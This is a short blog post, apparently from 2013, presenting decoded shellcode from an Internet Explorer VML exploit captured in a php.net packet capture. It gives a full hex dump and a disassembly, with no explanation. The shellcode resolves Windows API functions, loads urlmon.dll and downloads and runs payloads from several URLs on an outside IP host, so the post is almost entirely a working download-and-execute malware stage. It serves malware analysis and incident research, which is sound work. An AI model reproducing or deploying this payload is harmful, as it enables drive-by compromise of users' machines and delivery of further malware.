Friday, October 25, 2013

Decoded shellcode from the IE vml exploit seen in the php.net pcap


00000000  e8 00 00 00 00 5b 8d b3 bf 01 00 00 56 8d b3 ab  .....[......V...
00000010  01 00 00 56 6a 04 68 88 4e 0d 00 e8 af 00 00 00  ...Vj.h.N.......
00000020  8d 83 d3 01 00 00 50 ff 93 bf 01 00 00 8d b3 cf  ......P.........
00000030  01 00 00 56 8d b3 bb 01 00 00 56 6a 01 68 88 90  ...V......Vj.h..
00000040  03 00 e8 88 00 00 00 8d b3 de 01 00 00 89 f7 ac  ................
00000050  3c 7c 74 06 84 c0 74 02 eb f5 c6 46 ff 00 80 3f  <|t...t....F...?
00000060  00 74 08 57 e8 04 00 00 00 eb e2 c9 c3 55 89 e5  .t.W.........U..
00000070  81 ec 08 02 00 00 60 8d b5 f8 fd ff ff 56 68 60  ......`......Vh`
00000080  02 00 00 ff 93 c3 01 00 00 8d bd fc fe ff ff 57  ...............W
00000090  68 00 00 00 00 68 00 00 00 00 56 ff 93 c7 01 00  h....h....V.....
000000a0  00 68 00 00 00 00 68 00 00 00 00 57 ff 75 08 68  .h....h....W.u.h
000000b0  00 00 00 00 ff 93 cf 01 00 00 85 c0 75 0c 68 05  ............u.h.
000000c0  00 00 00 57 ff 93 cb 01 00 00 61 c9 c2 04 00 55  ...W......a....U
000000d0  89 e5 51 56 57 8b 4d 0c 8b 75 10 8b 7d 14 ff 36  ..QVW.M..u..}..6
000000e0  ff 75 08 e8 13 00 00 00 89 07 83 c7 04 83 c6 04  .u..............
000000f0  e2 ec 5f 5e 59 89 ec 5d c2 10 00 55 89 e5 53 56  .._^Y..]...U..SV
00000100  57 51 64 ff 35 30 00 00 00 58 8b 40 0c 8b 48 0c  WQd.50...X.@..H.
00000110  8b 11 8b 41 30 6a 02 8b 7d 08 57 50 e8 5b 00 00  ...A0j..}.WP.[..
00000120  00 85 c0 74 04 89 d1 eb e7 8b 41 18 50 8b 58 3c  ...t......A.P.X<
00000130  01 d8 8b 58 78 58 50 01 c3 8b 4b 1c 8b 53 20 8b  ...XxXP...K..S .
00000140  5b 24 01 c1 01 c2 01 c3 8b 32 58 50 01 c6 6a 01  [$.......2XP..j.
00000150  ff 75 0c 56 e8 23 00 00 00 85 c0 74 08 83 c2 04  .u.V.#.....t....
00000160  83 c3 02 eb e3 58 31 d2 66 8b 13 c1 e2 02 01 d1  .....X1.f.......
00000170  03 01 59 5f 5e 5b 89 ec 5d c2 08 00 55 89 e5 51  ..Y_^[..]...U..Q
00000180  53 52 31 c9 31 db 31 d2 8b 45 08 8a 10 80 ca 60  SR1.1.1..E.....`
00000190  01 d3 d1 e3 03 45 10 8a 08 84 c9 e0 ee 31 c0 8b  .....E.......1..
000001a0  4d 0c 39 cb 74 01 40 5a 5b 59 89 ec 5d c2 0c 00  M.9.t.@Z[Y..]...
000001b0  86 57 0d 00 92 21 0d 00 ce 15 d2 00 ea 6f 00 00  .W...!.......o..
000001c0  c6 30 8e 03 00 00 00 00 00 00 00 00 00 00 00 00  .0..............
000001d0  00 00 00 00 00 00 00 00 75 72 6c 6d 6f 6e 2e 64  ........urlmon.d
000001e0  6c 6c 00 68 74 74 70 3a 2f 2f 31 34 34 2e 37 36  ll.http://144.76
000001f0  2e 31 39 32 2e 31 30 32 2f 3f 39 64 65 32 36 66  .192.102/?9de26f
00000200  66 33 62 36 36 62 61 38 32 62 33 35 65 33 31 62  f3b66ba82b35e31b
00000210  66 34 65 61 39 37 35 64 66 65 7c 68 74 74 70 3a  f4ea975dfe|http:
00000220  2f 2f 31 34 34 2e 37 36 2e 31 39 32 2e 31 30 32  //144.76.192.102
00000230  2f 3f 39 30 66 35 62 39 61 31 66 62 63 62 32 65  /?90f5b9a1fbcb2e
00000240  34 61 38 37 39 30 30 31 61 32 38 64 37 39 34 30  4a879001a28d7940
00000250  62 34 7c 68 74 74 70 3a 2f 2f 31 34 34 2e 37 36  b4|http://144.76
00000260  2e 31 39 32 2e 31 30 32 2f 3f 38 65 65 63 36 63  .192.102/?8eec6c
00000270  35 39 36 62 62 33 65 36 38 34 30 39 32 62 39 65  596bb3e684092b9e
00000280  61 38 39 37 30 64 37 65 61 65 7c 68 74 74 70 3a  a8970d7eae|http:
00000290  2f 2f 31 34 34 2e 37 36 2e 31 39 32 2e 31 30 32  //144.76.192.102
000002a0  2f 3f 33 35 35 32 33 62 62 38 31 65 63 61 36 30  /?35523bb81eca60
000002b0  34 66 39 65 62 64 31 37 34 38 38 37 39 66 33 66  4f9ebd1748879f3f
000002c0  63 31 7c 68 74 74 70 3a 2f 2f 31 34 34 2e 37 36  c1|http://144.76
000002d0  2e 31 39 32 2e 31 30 32 2f 3f 62 32 38 62 30 36  .192.102/?b28b06
000002e0  66 30 31 65 32 31 39 64 35 38 65 66 62 61 39 66  f01e219d58efba9f
000002f0  65 30 64 31 66 65 31 62 62 33 7c 68 74 74 70 3a  e0d1fe1bb3|http:
00000300  2f 2f 31 34 34 2e 37 36 2e 31 39 32 2e 31 30 32  //144.76.192.102
00000310  2f 3f 35 32 64 34 65 36 34 34 65 39 63 64 61 35  /?52d4e644e9cda5
00000320  31 38 38 32 34 32 39 33 65 37 61 34 63 64 62 37  18824293e7a4cdb7
00000330  61 31 00                                         a1.

Disassembly of the code portion:

00000000  E800000000        call dword 0x5
00000005  5B                pop ebx
00000006  8DB3BF010000      lea esi,[ebx+0x1bf]
0000000C  56                push esi
0000000D  8DB3AB010000      lea esi,[ebx+0x1ab]
00000013  56                push esi
00000014  6A04              push byte +0x4
00000016  68884E0D00        push dword 0xd4e88
0000001B  E8AF000000        call dword 0xcf
00000020  8D83D3010000      lea eax,[ebx+0x1d3]
00000026  50                push eax
00000027  FF93BF010000      call dword [ebx+0x1bf]
0000002D  8DB3CF010000      lea esi,[ebx+0x1cf]
00000033  56                push esi
00000034  8DB3BB010000      lea esi,[ebx+0x1bb]
0000003A  56                push esi
0000003B  6A01              push byte +0x1
0000003D  6888900300        push dword 0x39088
00000042  E888000000        call dword 0xcf
00000047  8DB3DE010000      lea esi,[ebx+0x1de]
0000004D  89F7              mov edi,esi
0000004F  AC                lodsb
00000050  3C7C              cmp al,0x7c
00000052  7406              jz 0x5a
00000054  84C0              test al,al
00000056  7402              jz 0x5a
00000058  EBF5              jmp short 0x4f
0000005A  C646FF00          mov byte [esi-0x1],0x0
0000005E  803F00            cmp byte [edi],0x0
00000061  7408              jz 0x6b
00000063  57                push edi
00000064  E804000000        call dword 0x6d
00000069  EBE2              jmp short 0x4d
0000006B  C9                leave
0000006C  C3                ret
0000006D  55                push ebp
0000006E  89E5              mov ebp,esp
00000070  81EC08020000      sub esp,0x208
00000076  60                pushad
00000077  8DB5F8FDFFFF      lea esi,[ebp-0x208]
0000007D  56                push esi
0000007E  6860020000        push dword 0x260
00000083  FF93C3010000      call dword [ebx+0x1c3]
00000089  8DBDFCFEFFFF      lea edi,[ebp-0x104]
0000008F  57                push edi
00000090  6800000000        push dword 0x0
00000095  6800000000        push dword 0x0
0000009A  56                push esi
0000009B  FF93C7010000      call dword [ebx+0x1c7]
000000A1  6800000000        push dword 0x0
000000A6  6800000000        push dword 0x0
000000AB  57                push edi
000000AC  FF7508            push dword [ebp+0x8]
000000AF  6800000000        push dword 0x0
000000B4  FF93CF010000      call dword [ebx+0x1cf]
000000BA  85C0              test eax,eax
000000BC  750C              jnz 0xca
000000BE  6805000000        push dword 0x5
000000C3  57                push edi
000000C4  FF93CB010000      call dword [ebx+0x1cb]
000000CA  61                popad
000000CB  C9                leave
000000CC  C20400            ret 0x4
000000CF  55                push ebp
000000D0  89E5              mov ebp,esp
000000D2  51                push ecx
000000D3  56                push esi
000000D4  57                push edi
000000D5  8B4D0C            mov ecx,[ebp+0xc]
000000D8  8B7510            mov esi,[ebp+0x10]
000000DB  8B7D14            mov edi,[ebp+0x14]
000000DE  FF36              push dword [esi]
000000E0  FF7508            push dword [ebp+0x8]
000000E3  E813000000        call dword 0xfb
000000E8  8907              mov [edi],eax
000000EA  83C704            add edi,byte +0x4
000000ED  83C604            add esi,byte +0x4
000000F0  E2EC              loop 0xde
000000F2  5F                pop edi
000000F3  5E                pop esi
000000F4  59                pop ecx
000000F5  89EC              mov esp,ebp
000000F7  5D                pop ebp
000000F8  C21000            ret 0x10
000000FB  55                push ebp
000000FC  89E5              mov ebp,esp
000000FE  53                push ebx
000000FF  56                push esi
00000100  57                push edi
00000101  51                push ecx
00000102  64FF3530000000    push dword [dword fs:0x30]
00000109  58                pop eax
0000010A  8B400C            mov eax,[eax+0xc]
0000010D  8B480C            mov ecx,[eax+0xc]
00000110  8B11              mov edx,[ecx]
00000112  8B4130            mov eax,[ecx+0x30]
00000115  6A02              push byte +0x2
00000117  8B7D08            mov edi,[ebp+0x8]
0000011A  57                push edi
0000011B  50                push eax
0000011C  E85B000000        call dword 0x17c
00000121  85C0              test eax,eax
00000123  7404              jz 0x129
00000125  89D1              mov ecx,edx
00000127  EBE7              jmp short 0x110
00000129  8B4118            mov eax,[ecx+0x18]
0000012C  50                push eax
0000012D  8B583C            mov ebx,[eax+0x3c]
00000130  01D8              add eax,ebx
00000132  8B5878            mov ebx,[eax+0x78]
00000135  58                pop eax
00000136  50                push eax
00000137  01C3              add ebx,eax
00000139  8B4B1C            mov ecx,[ebx+0x1c]
0000013C  8B5320            mov edx,[ebx+0x20]
0000013F  8B5B24            mov ebx,[ebx+0x24]
00000142  01C1              add ecx,eax
00000144  01C2              add edx,eax
00000146  01C3              add ebx,eax
00000148  8B32              mov esi,[edx]
0000014A  58                pop eax
0000014B  50                push eax
0000014C  01C6              add esi,eax
0000014E  6A01              push byte +0x1
00000150  FF750C            push dword [ebp+0xc]
00000153  56                push esi
00000154  E823000000        call dword 0x17c
00000159  85C0              test eax,eax
0000015B  7408              jz 0x165
0000015D  83C204            add edx,byte +0x4
00000160  83C302            add ebx,byte +0x2
00000163  EBE3              jmp short 0x148
00000165  58                pop eax
00000166  31D2              xor edx,edx
00000168  668B13            mov dx,[ebx]
0000016B  C1E202            shl edx,0x2
0000016E  01D1              add ecx,edx
00000170  0301              add eax,[ecx]
00000172  59                pop ecx
00000173  5F                pop edi
00000174  5E                pop esi
00000175  5B                pop ebx
00000176  89EC              mov esp,ebp
00000178  5D                pop ebp
00000179  C20800            ret 0x8